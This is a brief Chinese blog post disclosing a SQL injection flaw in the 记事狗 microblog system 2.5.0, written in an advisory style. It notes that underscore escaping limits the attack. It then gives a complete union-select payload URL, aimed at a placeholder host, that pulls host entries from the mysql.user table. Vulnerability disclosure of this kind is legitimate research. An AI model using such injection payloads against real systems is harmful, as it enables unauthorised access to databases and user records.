记事狗2.5.0鸡肋注入漏洞
无意中发现的,只测试了“记事狗微博客系统2.5.0 UTF8 Build 20110130”
因为系统会将”_” 转换为”\_” 所以像”load_file”、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。
测试方法:
http://www.xx.com/index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/mysql.user%23
EXP不会造成严重影响,且仅供研究之用
by 疯子博客
上一篇:网纪互联公文签收系统上传漏洞